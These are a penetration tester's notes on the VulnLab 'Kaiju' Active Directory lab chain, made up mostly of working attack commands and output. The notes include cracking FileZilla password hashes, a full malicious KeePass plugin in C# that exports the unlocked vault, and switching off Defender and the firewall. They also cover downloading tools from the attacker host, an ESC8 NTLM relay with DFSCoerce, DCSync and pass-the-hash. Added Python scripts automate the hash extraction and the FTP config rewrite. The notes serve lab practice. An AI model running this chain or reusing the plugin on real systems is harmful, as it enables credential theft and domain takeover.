Kaiju (Chain)
This is not a writeup, just my notes about VulnLabs machines.
Last updated
Operating System: Microsoft Windows Server 2022 Standard
Chain: True (3 Machines)
User            Password          Obtained via                    Access
Administrator   NakedMelonMan25   KeePass malicious plugin DLL    Local Administrator on BERSRV200
clare.frost     atnTYzyew3Ok+d    Dumped via LSA secrets (nxc)    Domain User
✅ Valid Usernames
Administrator
clare.frost
🔑 Passwords list
NakedMelonMan25
atnTYzyew3Ok+d
Host is up (0.019s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
3389/tcp open ms-wbt-server
Host is up (0.019s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
3389/tcp open ms-wbt-server
Host is up (0.018s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
3389/tcp open ms-wbt-server
FTP allows anonymous authentication.
A KeePass database, it.kdbx, was found on the FTP share.
During enumeration the tester also found users.xml on the FTP service. It contains the FileZilla Server password entry of the backup user, a PBKDF2-HMAC-SHA256 hash (base64 hash and salt, 100000 iterations), and a mount point for E:\Public, which indicates the presence of an additional disk:
<password index="1">
<hash>ZqRNhkBO8d4VYJb0YmF7cJgjECAH43MHdNABkHYjNFU</hash>
<salt>aec9Yt49edyEvXkZUinmS52UrwNoNNgoM+6rK3fuFFw</salt>
<iterations>100000</iterations>
</password>
Rewritten into the hashcat mode 10900 (PBKDF2-HMAC-SHA256) layout sha256:<iterations>:<base64 salt>:<base64 hash>, with the base64 fields copied verbatim from users.xml:
sha256:100000:aec9Yt49edyEvXkZUinmS52UrwNoNNgoM+6rK3fuFFw:ZqRNhkBO8d4VYJb0YmF7cJgjECAH43MHdNABkHYjNFU
❯ hashcat -m 10900 hash.txt possible-passwords.txt -r /usr/share/hashcat/rules/best64.rule
<SNIP>
Dictionary cache built:
* Filename..: possible-passwords.txt
* Passwords.: 12
* Bytes.....: 91
* Keyspace..: 924
* Runtime...: 0 secs
sha256:100000:aec9Yt49edyEvXkZUinmS52UrwNoNNgoM+6rK3fuFFw:ZqRNhkBO8d4VYJb0YmF7cJgjECAH43MHdNABkHYjNFU:backup123
Password Found: backup123
The FileZilla password backup123 is reused for the SSH account backup:
❯ ssh backup@10.10.170.134
Microsoft Windows [Version 10.0.20348.2159]
(c) Microsoft Corporation. All rights reserved.
backup@BERSRV200 C:\Users\backup>
backup@BERSRV200 C:\Users\backup>dir E:\
Volume in drive E is Data
Volume Serial Number is A494-31FF
Directory of E:\
12/27/2023 03:15 AM <DIR> Private
12/27/2023 03:15 AM <DIR> Program Files
12/27/2023 03:15 AM <DIR> Public
0 File(s) 0 bytes
3 Dir(s) 1,960,206,336 bytes free
FileZilla Server's install.log on the data disk also records the administration password hash (same PBKDF2 scheme):
backup@BERSRV200 E:\Program Files\FileZilla Server>type install.log
<SNIP>
Crypt output: [--admin.password@index=1 --admin.password.hash=mSbrgj1R6oqMMSk4Qk1TuYTchS5r8Yk3Y5vsBgf2tF8 --admin.password.salt=AdRNx7rAs1CEM23S5Zp7NyAQYHcuo2LuevU3pAXKB18 --admin.password.iterations=100000]
<SNIP>
❯ hashcat -m 10900 admin.hash possible-passwords.txt -r /usr/share/hashcat/rules/best64.rule
<SNIP>
Dictionary cache hit:
* Filename..: possible-passwords.txt
* Passwords.: 12
* Bytes.....: 91
* Keyspace..: 924
sha256:100000:AdRNx7rAs1CEM23S5Zp7NyAQYHcuo2LuevU3pAXKB18:mSbrgj1R6oqMMSk4Qk1TuYTchS5r8Yk3Y5vsBgf2tF8:kaiju123
FileZilla Server administration password: kaiju123
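As an added example (not part of the original notes), the two extraction steps above in Python: it pulls the PBKDF2 fields out of users.xml and out of the install.log "Crypt output" line, builds the mode 10900 line from them, and recomputes PBKDF2-HMAC-SHA256 for a candidate so a crack can be confirmed without hashcat. The XML wrapper around the page's <password> block and the log line are reconstructed sample input; the hash, salt and iteration values are the ones from the notes.

```python
#!/usr/bin/env python3
"""Added example, not from the original notes: parse FileZilla Server's
PBKDF2 password entries (users.xml and the install.log "Crypt output"
line), emit hashcat mode 10900 lines, and verify a candidate offline."""
import base64
import hashlib
import hmac
import re
import xml.etree.ElementTree as ET

# Constructed sample in the FileZilla Server 1.x users.xml layout. The hash,
# salt and iteration count are the values from the notes for the "backup"
# user; the surrounding elements are reconstructed for this example.
SAMPLE_USERS_XML = """<filezilla>
  <users>
    <user name="backup" enabled="true">
      <mount_point tvfs_path="/" native_path="E:\\Public" access="1" recursive="2" flags="0" />
      <password index="1">
        <hash>ZqRNhkBO8d4VYJb0YmF7cJgjECAH43MHdNABkHYjNFU</hash>
        <salt>aec9Yt49edyEvXkZUinmS52UrwNoNNgoM+6rK3fuFFw</salt>
        <iterations>100000</iterations>
      </password>
    </user>
  </users>
</filezilla>
"""

# The admin password line as it appears in install.log in the notes.
SAMPLE_INSTALL_LOG = (
    "Crypt output: [--admin.password@index=1 "
    "--admin.password.hash=mSbrgj1R6oqMMSk4Qk1TuYTchS5r8Yk3Y5vsBgf2tF8 "
    "--admin.password.salt=AdRNx7rAs1CEM23S5Zp7NyAQYHcuo2LuevU3pAXKB18 "
    "--admin.password.iterations=100000]"
)


def b64decode_unpadded(s: str) -> bytes:
    """FileZilla writes base64 without '=' padding; restore it before decoding."""
    s = s.strip()
    return base64.b64decode(s + "=" * (-len(s) % 4))


def entries_from_users_xml(xml_text: str) -> list:
    """One {user, hash, salt, iterations} dict per <password> block in users.xml."""
    entries = []
    for user in ET.fromstring(xml_text).iter("user"):
        pw = user.find("password")
        if pw is None:
            continue
        entries.append({
            "user": user.get("name"),
            "hash": pw.findtext("hash").strip(),
            "salt": pw.findtext("salt").strip(),
            "iterations": int(pw.findtext("iterations")),
        })
    return entries


def entries_from_install_log(log_text: str) -> list:
    """Pull the admin.password.{hash,salt,iterations} triple out of install.log."""
    pat = re.compile(
        r"--admin\.password\.hash=(\S+)\s+--admin\.password\.salt=(\S+)\s+"
        r"--admin\.password\.iterations=(\d+)"
    )
    return [{"user": "admin", "hash": h, "salt": s, "iterations": int(i)}
            for h, s, i in pat.findall(log_text)]


def hashcat_line(entry: dict) -> str:
    """hashcat -m 10900 layout: sha256:<iterations>:<base64 salt>:<base64 hash>."""
    return f"sha256:{entry['iterations']}:{entry['salt']}:{entry['hash']}"


def verify_candidate(entry: dict, candidate: str) -> bool:
    """Recompute PBKDF2-HMAC-SHA256 for the candidate and compare in constant time."""
    expected = b64decode_unpadded(entry["hash"])
    derived = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode("utf-8"), b64decode_unpadded(entry["salt"]),
        entry["iterations"], dklen=len(expected))
    return hmac.compare_digest(derived, expected)


if __name__ == "__main__":
    entries = entries_from_users_xml(SAMPLE_USERS_XML) + entries_from_install_log(SAMPLE_INSTALL_LOG)
    for entry in entries:
        print(hashcat_line(entry))  # feed these lines to hashcat -m 10900
        for guess in ("backup123", "kaiju123", "password"):
            if verify_candidate(entry, guess):
                print(f"  {entry['user']}: {guess}")
```

The padding helper matters: FileZilla's base64 is 43 characters for a 32-byte value and Python's decoder rejects it without the trailing "=", while hashcat accepts it as-is, which is why the fields are copied verbatim into the hashcat line but padded before the local check.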
Forward the FileZilla Server administration port (14148, not reachable from outside) over SSH so the administration interface can be used with the admin password kaiju123:
❯ ssh backup@10.10.130.54 -L 0.0.0.0:14148:localhost:14148
PS E:\Program Files\FileZilla Server> (Get-Item "E:\Program Files\FileZilla Server\filezilla-server.exe").Versioninfo
ProductVersion FileVersion FileName
-------------- ----------- --------
1, 8, 0, 0 1, 8, 0, 0 E:\Program Files\FileZilla Server\filezilla-server.exe
Because of a bug in FileZilla Server 1.8.0 that prevents modifying the configuration directly in the administration interface, the tester exported the configuration file, changed the new_native_path attribute of the backup user's "/" mount point to C:\, and reimported it. The password block is left untouched so backup can still log in:
<user name="backup" enabled="true">
<mount_point tvfs_path="/" access="1" native_path="" new_native_path="C:\" recursive="2" flags="0" />
<rate_limits inbound="unlimited" outbound="unlimited" session_inbound="unlimited" session_outbound="unlimited" />
<allowed_ips></allowed_ips>
<disallowed_ips></disallowed_ips>
<session_open_limits files="unlimited" directories="unlimited" />
<session_count_limit>unlimited</session_count_limit>
<description></description>
<password index="1">
<hash>ZqRNhkBO8d4VYJb0YmF7cJgjECAH43MHdNABkHYjNFU</hash>
<salt>aec9Yt49edyEvXkZUinmS52UrwNoNNgoM+6rK3fuFFw</salt>
<iterations>100000</iterations>
</password>
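Added example, not from the notes: the export, edit and reimport step done programmatically with Python's ElementTree. The sample configuration is constructed, wrapping the page's <user> block (with the mount still pointing at the data disk) in a reconstructed <filezilla><users> root. It retargets the backup user's "/" mount point and leaves the password block untouched so the account still authenticates after the import.

```python
#!/usr/bin/env python3
"""Added example, not from the original notes: retarget a FileZilla Server
mount point in an exported configuration, keeping the password block intact."""
import xml.etree.ElementTree as ET

# Constructed sample: the <user> block from the notes, before the edit (share
# still mapped to the data disk), wrapped in a reconstructed root element.
SAMPLE_EXPORT = """<filezilla>
  <users>
    <user name="backup" enabled="true">
      <mount_point tvfs_path="/" access="1" native_path="" new_native_path="E:\\Public" recursive="2" flags="0" />
      <rate_limits inbound="unlimited" outbound="unlimited" session_inbound="unlimited" session_outbound="unlimited" />
      <password index="1">
        <hash>ZqRNhkBO8d4VYJb0YmF7cJgjECAH43MHdNABkHYjNFU</hash>
        <salt>aec9Yt49edyEvXkZUinmS52UrwNoNNgoM+6rK3fuFFw</salt>
        <iterations>100000</iterations>
      </password>
    </user>
  </users>
</filezilla>
"""


def list_mounts(xml_text: str) -> list:
    """(user, virtual path, native path) for every mount point. new_native_path is
    preferred over native_path, matching the exported file where native_path is
    empty and the new_* attribute carries the value that gets imported."""
    root = ET.fromstring(xml_text)
    return [(u.get("name"), m.get("tvfs_path"), m.get("new_native_path") or m.get("native_path"))
            for u in root.iter("user") for m in u.findall("mount_point")]


def mount_exists(xml_text: str, user: str, tvfs_path: str) -> bool:
    """True if the user has a mount point at the given virtual path."""
    return any(u == user and v == tvfs_path for u, v, _ in list_mounts(xml_text))


def retarget_mount(xml_text: str, user: str, tvfs_path: str, new_native_path: str) -> str:
    """Return the configuration with the user's tvfs_path mount pointed at new_native_path.
    Only that one attribute changes: hash, salt and iterations stay as they are, so
    the account authenticates exactly as before once the file is reimported."""
    root = ET.fromstring(xml_text)
    for u in root.iter("user"):
        if u.get("name") != user:
            continue
        for m in u.findall("mount_point"):
            if m.get("tvfs_path") == tvfs_path:
                m.set("new_native_path", new_native_path)
                return ET.tostring(root, encoding="unicode")
    raise KeyError(f"no mount {tvfs_path!r} for user {user!r}")


if __name__ == "__main__":
    print(list_mounts(SAMPLE_EXPORT))
    rewritten = retarget_mount(SAMPLE_EXPORT, "backup", "/", "C:\\")
    print(list_mounts(rewritten))  # "/" now maps to C:\ for the backup user
```

After the import, everything the FileZilla Server service account can reach under C:\ is readable and writable through the backup FTP login, which is what makes the authorized_keys drop below possible.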
Generate an SSH key pair to plant as authorized_keys:
❯ ssh-keygen -t ed25519
Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/Intrusionz3r0/.ssh/id_ed25519): sasrv200
Enter passphrase for "sasrv200" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in sasrv200
Your public key has been saved in sasrv200.pub
The key fingerprint is:
SHA256:7Hm6WnE/3jTe4JgmwQ0WWRrBwu4OQasqu96LLDP8Gtw Intrusionz3r0@kali
The key's randomart image is:
+--[ED25519 256]--+
| . .o+. |
| . o +o |
| . o ... |
| o.. o |
| . oSo.o |
|. . . ...+o.. |
|.o E o+ ..o + |
|*.= ..o...O + |
|=@o+. ..o. o+ + .|
+----[SHA256]-----+
With "/" now mapped to C:\, the backup FTP login can write anywhere the FileZilla Server service account can. Drop the public key as authorized_keys for sasrv200 and log in with the private key:
❯ cp sasrv200.pub authorized_keys
ftp> put authorized_keys
❯ ssh -i sasrv200 sasrv200@10.10.211.38
Watch for a KeePass process on BERSRV200 to confirm that a user opens the database periodically:
PS C:\Users\sasrv200\Desktop> while ($true) { Get-Process | ? { $_.ProcessName -like '*keepass*' }; Start-Sleep -Seconds 5 }
Code (KeeFarceRebornPluginExt.cs, built as KeeFarceRebornPlugin.dll with KeePass.exe as a reference; KeePass loads a plugin through the class named <AssemblyName>Ext deriving from Plugin):
using System;
using System.IO;
using System.Windows.Forms;
using KeePass.DataExchange;
using KeePass.Forms;
using KeePass.Plugins;
using KeePassLib.Utility;
using KeePass;
using KeePassLib.Serialization;
using KeePass.App;
using KeePassLib.Keys;
using KeePassLib;

namespace KeeFarceRebornPlugin
{
    public sealed class KeeFarceRebornPluginExt : Plugin
    {
        private IPluginHost m_host = null;

        public override bool Initialize(IPluginHost host)
        {
            if (host == null) return false;
            m_host = host;
            // Fires after the user has unlocked a database, i.e. once the
            // decrypted PwDatabase is reachable through the host.
            m_host.MainWindow.FileOpened += this.OnFileOpened;
            return true;
        }

        private void OnFileOpened(object sender, FileOpenedEventArgs e)
        {
            // Export the whole tree of the database that was just opened in
            // KeePass's own plaintext XML format to a fixed path.
            var database = m_host.Database;
            var rootGroup = database.RootGroup;
            PwExportInfo pwExportInfo = new PwExportInfo(rootGroup, database);
            FileFormatProvider fileFormat = Program.FileFormatPool.Find("KeePass XML (2.x)");
            string exportFilePath = "C:\\temp\\export.xml";
            IOConnectionInfo iocOutput = IOConnectionInfo.FromPath(exportFilePath);

            if (pwExportInfo == null) return;
            if (pwExportInfo.DataGroup == null) return;
            if (fileFormat == null) return;
            bool bFileReq = fileFormat.RequiresFile;
            if (bFileReq && (iocOutput == null)) return;
            if (bFileReq && (iocOutput.Path.Length == 0)) return;
            PwDatabase pd = pwExportInfo.ContextDatabase;
            if (pd == null) return;

            // Export is refused unless the Export policy is enabled; that is
            // why the planted KeePass.config.xml sets <Export>true</Export>.
            if (!AppPolicy.Try(AppPolicyId.Export)) return;
            if (!fileFormat.SupportsExport) return;
            if (!fileFormat.TryBeginExport()) return;

            bool bExistedAlready = true;
            bool bResult = false;
            try
            {
                if (bFileReq) bExistedAlready = IOConnection.FileExists(iocOutput);
                Stream s = (bFileReq ? IOConnection.OpenWrite(iocOutput) : null);
                try
                {
                    bResult = fileFormat.Export(pwExportInfo, s, null);
                }
                finally { if (s != null) s.Close(); }
            }
            catch (Exception ex) { MessageService.ShowWarning(ex); } // shown to the victim on failure

            // Do not leave an empty file behind if the export failed.
            if (bFileReq && !bResult && !bExistedAlready)
            {
                try { IOConnection.DeleteFile(iocOutput); }
                catch (Exception) { }
            }
        }
    }
}
File: KeePass.config.xml
<?xml version="1.0" encoding="utf-8"?>
<Configuration xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Meta>
<PreferUserConfiguration>true</PreferUserConfiguration>
</Meta>
<Policy>
<Plugins>true</Plugins>
<Export>true</Export>
</Policy>
</Configuration>
To abuse the malicious plugin:
Upload KeeFarceRebornPlugin.dll into E:\Public\Software\KeePass2\Plugins (KeePass loads every DLL in its Plugins directory at startup).
Replace KeePass.config.xml next to KeePass.exe with the configuration above, which enables plugins and exports under Policy.
Wait a few minutes; once a user opens the database, export.xml is written to C:\Temp.
PS C:\Temp> type export.xml
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<KeePassFile>
<SNIP>
<String>
<Key>Password</Key>
<Value ProtectInMemory="True">NakedMelonMan25</Value>
</String>
<SNIP>
</KeePassFile>
From an elevated session on BERSRV200, disable Defender real-time monitoring and the host firewall before staging further tooling:
PS E:\Public\Software\KeePass2\Plugins> Set-MPPreference -DisableRealTimeMonitoring $true
PS E:\Public\Software\KeePass2\Plugins> (Get-MPComputerStatus).RealTimeProtectionEnabled
False
PS E:\Public\Software\KeePass2\Plugins> Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
Dump LSA secrets on BERSRV200 with the local Administrator password; cached domain logons (DCC2) and a cleartext domain credential for clare.frost come out:
❯ proxychains nxc smb 10.10.223.214 -u Administrator -p 'NakedMelonMan25' --local-auth --lsa 2>/dev/null
SMB 10.10.223.214 445 BERSRV200 [*] Windows Server 2022 Build 20348 x64 (name:BERSRV200) (domain:BERSRV200) (signing:False) (SMBv1:False)
SMB 10.10.223.214 445 BERSRV200 [+] BERSRV200\Administrator:NakedMelonMan25 (Pwn3d!)
SMB 10.10.223.214 445 BERSRV200 [+] Dumping LSA secrets
SMB 10.10.223.214 445 BERSRV200 KAIJU.VL/sasrv200:$DCC2$10240#sasrv200#44a1583ed4678aa2fba0bd7d13eea30f: (2024-01-30 20:13:30)
SMB 10.10.223.214 445 BERSRV200 KAIJU.VL/Clare.Frost:$DCC2$10240#Clare.Frost#180216e4d0aa40dbf4767dd7ba50f187: (2024-01-21 15:01:24)
SMB 10.10.223.214 445 BERSRV200 KAIJU.VL/Administrator:$DCC2$10240#Administrator#873c4a9511ccfd89537a22fc1cc3ff35: (2024-01-21 15:17:37)
SMB 10.10.223.214 445 BERSRV200 KAIJU\BERSRV200$:aes256-cts-hmac-sha1-96:6133fe5a03272b2913687fc953a7bbbef6f3c13a814f7433592c3ad22296b3ad
SMB 10.10.223.214 445 BERSRV200 KAIJU\BERSRV200$:aes128-cts-hmac-sha1-96:4f20bf429199d4eebccbc116a80532e4
SMB 10.10.223.214 445 BERSRV200 KAIJU\BERSRV200$:des-cbc-md5:dfa48f024a6bbc4c
SMB 10.10.223.214 445 BERSRV200 KAIJU\BERSRV200$:plain_password_hex:6602fb36225eef29799d53ec405d84cb172a6ace527631c7493faba05f7785b8b5c44219caf9dec7143f9662021b24bbd0b629e19d8ec87142eedaa41bb1a4f6841afae9e885b43f37e7a19a1671f67d13c4c4e2fddb68d7fbe15fc5c3c307f1027374ebfc8fd9d542ad566e1bd35735ae24b12f9e1a0f5336aad4cbe5131362b41ce3ecd1c31c4603c0923a07b3b4744aa66556ab19d67a7605459576c886f5b2500a42c1002141371982c1e787d936b0f424115b2dac33bd58d89b27d0d0076e9f43228c2594ce2fe1db60afe827bf0bb7897e74d279faa6c8353b4f020b63e9188343056503342d2e732ab5397422
SMB 10.10.223.214 445 BERSRV200 KAIJU\BERSRV200$:aad3b435b51404eeaad3b435b51404ee:5f3e096d29d5272e756639491122bcd1:::
SMB 10.10.223.214 445 BERSRV200 kaiju.vl\clare.frost:atnTYzyew3Ok+d
clare.frost is a domain user; enumerate AD CS for vulnerable configurations:
❯ proxychains certipy-ad find -u clare.frost -p 'atnTYzyew3Ok+d' -dc-ip 10.10.223.213 -vulnerable -stdout 2>/dev/null
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 2 certificate authorities
[*] Found 22 enabled certificate templates
[*] Trying to get CA configuration for 'kaiju-sub-CA' via CSRA
[!] Got error while trying to get CA configuration for 'kaiju-sub-CA' via CSRA: rpc_s_access_denied
[*] Trying to get CA configuration for 'kaiju-sub-CA' via RRP
[*] Got CA configuration for 'kaiju-sub-CA'
[*] Trying to get CA configuration for 'kaiju-CA' via CSRA
[!] Got error while trying to get CA configuration for 'kaiju-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'kaiju-CA' via RRP
[*] Got CA configuration for 'kaiju-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : kaiju-sub-CA
DNS Name : BERSRV105.kaiju.vl
Certificate Subject : CN=kaiju-sub-CA, DC=kaiju, DC=vl
Certificate Serial Number : 71000000048715771814C1ABBA000000000004
Certificate Validity Start : 2024-01-21 14:57:07+00:00
Certificate Validity End : 2026-01-21 15:07:07+00:00
Web Enrollment : Enabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : KAIJU.VL\Administrators
Access Rights
ManageCertificates : KAIJU.VL\Administrators
KAIJU.VL\Domain Admins
KAIJU.VL\Enterprise Admins
ManageCa : KAIJU.VL\Administrators
KAIJU.VL\Domain Admins
KAIJU.VL\Enterprise Admins
Enroll : KAIJU.VL\Authenticated Users
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue
1
CA Name : kaiju-CA
DNS Name : BERSRV100.kaiju.vl
Certificate Subject : CN=kaiju-CA, DC=kaiju, DC=vl
Certificate Serial Number : 6D6D8A048E2B8C9B4385A113BEEA1F00
Certificate Validity Start : 2023-12-17 14:14:04+00:00
Certificate Validity End : 2523-12-17 14:24:04+00:00
Web Enrollment : Enabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : KAIJU.VL\Administrators
Access Rights
ManageCertificates : KAIJU.VL\Administrators
KAIJU.VL\Domain Admins
KAIJU.VL\Enterprise Admins
ManageCa : KAIJU.VL\Administrators
KAIJU.VL\Domain Admins
KAIJU.VL\Enterprise Admins
Enroll : KAIJU.VL\Authenticated Users
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates : [!] Could not find any certificate templates
The tester ran into a problem exploiting ESC8: the coerced authentication has to reach ntlmrelayx, but outbound SMB traffic from the lab to the attacker host is blocked by a firewall. The workaround is to make the already-compromised BERSRV200 the relay endpoint: StreamDivert on BERSRV200 redirects inbound TCP/445 to 127.0.0.1:4455, and an SSH remote forward carries that port back to ntlmrelayx listening on the attacker's port 445.
Upload StreamDivert and its dependencies (the WinDivert DLL and drivers) to BERSRV200:
PS C:\Temp> IWR -URI http://10.8.5.48/config.txt -outfile config.txt
PS C:\Temp> IWR -URI http://10.8.5.48/StreamDivert.exe -outfile StreamDivert.exe
PS C:\Temp> IWR -URI http://10.8.5.48/StreamDivert.pdb -outfile StreamDivert.pdb
PS C:\Temp> IWR -URI http://10.8.5.48/WinDivert.dll -outfile WinDivert.dll
PS C:\Temp> IWR -URI http://10.8.5.48/WinDivert64.sys -outfile WinDivert64.sys
PS C:\Temp> IWR -URI http://10.8.5.48/WinDivert32.sys -outfile WinDivert32.sys
StreamDivert rule: redirect every inbound connection to TCP/445 to 127.0.0.1:4455. Run it from an elevated shell on BERSRV200, since it loads the WinDivert kernel driver:
administrator@BERSRV200 C:\Users\Administrator\Downloads>type config.txt
tcp < 445 0.0.0.0 -> 127.0.0.1 4455
administrator@BERSRV200 C:\Users\Administrator\Downloads>StreamDivert.exe config.txt -f -v
Reverse-forward 127.0.0.1:4455 on BERSRV200 to port 445 on the attacker host, where ntlmrelayx listens:
❯ ssh administrator@10.10.231.22 -R 4455:127.0.0.1:445
ntlmrelayx relays the coerced SMB authentication to the sub-CA's web enrollment endpoint and requests a certificate on the DomainController template, because the coerced principal is the DC's machine account (impacket's SMB2 flag is single-dash, -smb2support):
❯ proxychains impacket-ntlmrelayx -t http://BERSRV105.kaiju.vl/certsrv/certfnsh.asp -smb2support --adcs --template 'DomainController' --no-http-server 2>/dev/null
Coerce the DC (BERSRV100, reached through the domain name kaiju.vl) into authenticating to BERSRV200 over SMB with DFSCoerce, using clare.frost's credentials (arguments are listener, then target):
❯ proxychains -q python3 dfscoerce.py -u clare.frost -p 'atnTYzyew3Ok+d' -d 'kaiju.vl' BERSRV200 kaiju.vl
Output of ntlmrelayx:
[*] SMBD-Thread-4 (process_request_thread): Received connection from 127.0.0.1, attacking target http://BERSRV105.kaiju.vl
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://BERSRV105.kaiju.vl as KAIJU/BERSRV100$ SUCCEED
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] GOT CERTIFICATE! ID 7
[*] Writing PKCS#12 certificate to ./BERSRV100$.pfx
[*] Certificate successfully written to file
[*] SMBD-Thread-6 (process_request_thread): Received connection from 127.0.0.1, attacking target http://BERSRV105.kaiju.vl
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://BERSRV105.kaiju.vl as KAIJU/BERSRV100$ SUCCEED
[*] Skipping user BERSRV100$ since attack was already performed
Authenticate with the DC's certificate via PKINIT to obtain a TGT and the NT hash of BERSRV100$:
❯ proxychains certipy-ad auth -pfx dc.pfx 2>/dev/null
[*] Using principal: bersrv100$@kaiju.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'bersrv100.ccache'
[*] Trying to retrieve NT hash for 'bersrv100$'
[*] Got hash for 'bersrv100$@kaiju.vl': aad3b435b51404eeaad3b435b51404ee:82bea846cd5a029773b9ea9d2fe33c1c
With the DC machine account's TGT, DCSync the domain over DRSUAPI:
❯ export KRB5CCNAME='bersrv100.ccache'
❯ proxychains impacket-secretsdump -k -no-pass BERSRV100.kaiju.vl -just-dc 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b46720476be1abfbb3282cb80054f40:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e97467587cb5f64e221bdb985b6c2cb0:::
kaiju.vl\sasrv200:1104:aad3b435b51404eeaad3b435b51404ee:0049f304fb42d8b5b7336384d94ef5fa:::
<SNIP>
Pass the domain Administrator's NT hash to the DC over WinRM:
❯ proxychains evil-winrm -i BERSRV100 -u 'Administrator' -H 0b46720476be1abfbb3282cb80054f40 2>/dev/null
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
kaiju\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>
The tester used the format described in the following hashcat forum thread to build the hash line, with mode 10900, which corresponds to PBKDF2-HMAC-SHA256.